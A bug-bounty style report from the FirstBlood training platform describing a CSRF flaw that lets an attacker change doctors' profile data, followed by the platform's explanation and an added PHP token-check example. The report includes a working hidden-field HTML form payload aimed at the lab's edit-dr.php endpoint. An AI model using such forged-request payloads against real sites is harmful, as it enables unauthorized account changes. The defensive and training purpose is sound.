FirstBlood-#1014: CSRF to edit doctors information
This issue was discovered on FirstBlood v3



On 2022-12-08, properlay Level 7 reported:

Hello, I found a CSRF vulnerability to edit doctors' information.

To reproduce:

  1. Log in to your doctor administrator account.

  2. Copy and paste the code below into an HTML file.

<html>
    <body>
        <form method="POST" action="https://cbad703fc8c6-properlay.a.firstbloodhackers.com/drpanel/drapi/edit-dr.php">
            <input type="hidden" name="drid" value="1"/>
            <input type="hidden" name="name" value="attacke"/>
            <input type="hidden" name="bio" value="attacker"/>
            <input type="hidden" name="bookable" value="1"/>
            <input type="hidden" name="csrf" value=""/>
            <input type="submit" value="Submit">
        </form>
    </body>
</html>
  3. Open it in a browser, you will see doctor Julie's information change.

Impact:

Can edit doctors' information through CSRF.

P4 Low


FirstBlood ID: 58
Vulnerability Type: Cross Site Request Forgery

There is a CSRF vulnerability on /drpanel/edit-dr.php via a GET request and lack of token validation. It was intended that a POST request would not work because no cookies are sent with the request (because of SameSite), but due to an oversight this cookie was overwritten, rendering it useless.
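
A server-side check covering the two gaps named above (edits accepted via GET, no token validation), as an added example that is not FirstBlood's own code. The function names and the `csrf_token` session key are assumptions, and the sample requests are constructed.

```php
<?php
declare(strict_types=1);

// Added example: request gate for a state-changing endpoint such as edit-dr.php.
// Function names and the 'csrf_token' session key are assumptions.

function issue_csrf_token(array &$session): string
{
    // One unpredictable token per session, stored server-side.
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function check_state_change(string $method, array $params, array $session): ?string
{
    // Returns null when the request may proceed, otherwise the rejection reason.
    if ($method !== 'POST') {
        return 'method not allowed';          // no edits via GET
    }
    $expected  = $session['csrf_token'] ?? '';
    $submitted = $params['csrf'] ?? '';
    if (!is_string($expected) || $expected === '') {
        return 'no token issued for session'; // never compare against an empty value
    }
    if (!is_string($submitted) || !hash_equals($expected, $submitted)) {
        return 'csrf token mismatch';         // constant-time comparison
    }
    return null;
}

// Constructed sample requests, using the field names from the report's form.
$session = [];
$token   = issue_csrf_token($session);
$fields  = ['drid' => '1', 'name' => 'x', 'bio' => 'y', 'bookable' => '1'];

$cases = [
    'GET with valid token'               => ['GET',  $fields + ['csrf' => $token], $session],
    'POST, empty csrf field'             => ['POST', $fields + ['csrf' => ''],     $session],
    'POST, empty csrf, no session token' => ['POST', $fields + ['csrf' => ''],     []],
    'POST with valid token'              => ['POST', $fields + ['csrf' => $token], $session],
];
foreach ($cases as $label => [$m, $p, $s]) {
    printf("%-38s %s\n", $label, check_state_change($m, $p, $s) ?? 'accepted');
}
```

The third case is the one to watch: an empty submitted token must not match a session that never had a token issued.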

Report Feedback

@zseano

Creator & Administrator


Congratulations, you were the third researcher to discover this!